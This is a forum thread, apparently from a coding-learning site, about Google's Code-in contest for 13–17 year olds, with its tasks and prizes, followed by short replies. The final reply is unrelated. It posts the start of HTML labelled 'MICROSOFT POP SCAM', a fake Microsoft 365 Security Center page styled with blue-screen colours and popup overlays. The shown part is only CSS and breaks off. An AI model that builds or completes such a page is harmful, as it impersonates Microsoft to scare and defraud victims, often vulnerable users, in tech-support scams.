+ 27
Complete 3 task and Get a T-Shirt from Google
Google make many tasks and the prize are : Digital Certificate T-shirts Hoodies Grand Prize Trip The Task are : Code Document & Training Outreach & Research Quality Assurance User Interface more info : https://developers.google.com/open-source/gci/resources/example-tasks this task for 13-17 years old the rules https://developers.google.com/open-source/gci/resources/contest-rules This contest from Google end in 17 January More info : https://codein.withgoogle.com https://codein.withgoogle.com/about/
14 Answers
+ 14
Thanks for sharing @Artemis 😁👍
+ 10
@Nikhil Your WelCome
+ 9
@Davey how old are you?
+ 8
Hoodies✌️✌️
+ 3
Woah .. i want that hoodie. btw thanks for sharing @Artemis 😁
+ 3
what bout 18-above
+ 2
18....straight
0
14
0
what bout 18-above
0
Thank you Google
0
Hii
0
how to apply this swags
0
i have complete all but there is not showing any update
0
This is the html code of MICROSOFT POP SCAM. it make for my personal use.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Microsoft 365 | Security Center</title>
<style>
/* =========================================
GLOBAL SETTINGS
========================================= */
:root {
--font-stack: 'Segoe UI', 'Helvetica Neue', Helvetica, Arial, sans-serif;
--win-blue: #0078d7;
--bsod-blue: #0066cc;
--ms-blue: #0067b8;
--overlay-dim: rgba(0, 0, 0, 0.6); /* Darker dim to focus on popups */
}
* { box-sizing: border-box; }
body {
font-family: var(--font-stack);
margin: 0;
padding: 0;
height: 100vh;
width: 100vw;
overflow: hidden;
background-color: #fff;
user-select: none;
cursor: default;
}
/* =========================================
PART 1: THE BACKGROUND PAGE (Microsoft 365)
========================================= */
#landing-page {
width: 100%;
height: 100%;
display: flex;
flex-direction: column;
background: #f2f2f2;
position: absolute;
z-index: 1;
}
/* Header */
.ms-header {
background: #fff;
padding: 0 5%;
height: 54px;
display: flex;
align-items: center;
justify-content: space-between;
box-shadow: 0 1px 2px rgba(0,0,0,0.1);
}
.header-left, .header-right { display: flex; align-items: center; gap: 20px; font-size: 13px; color: #242424; }
.ms-brand-logo { display: flex; align-items: center; font-weight: 600; font-size: 18px; color: #555; padding-right: 10px; border-right: 1px dotted #999; margin-right: 5px; }



